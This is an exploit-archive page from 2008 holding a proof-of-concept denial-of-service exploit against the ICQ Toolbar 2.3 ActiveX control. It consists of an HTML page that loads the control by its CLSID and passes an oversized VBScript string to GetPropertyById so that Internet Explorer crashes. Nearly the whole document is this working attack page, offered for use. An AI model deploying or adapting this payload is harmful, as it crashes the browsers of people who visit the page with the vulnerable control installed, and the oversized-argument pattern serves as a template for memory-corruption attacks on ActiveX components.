[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ICQ Toolbar 2.3 ActiveX Remote Denial of Service Exploit
# Published : 2008-03-06
# Author : spdr
# Previous Title : KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC
# Next Title : ASG-Sentry <= 7.0.0 Multiple Remote Vulnerabilities


<!--
	Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p
-->

<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>

<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof

</script>
</html>

# www.Syue.com [2008-03-06]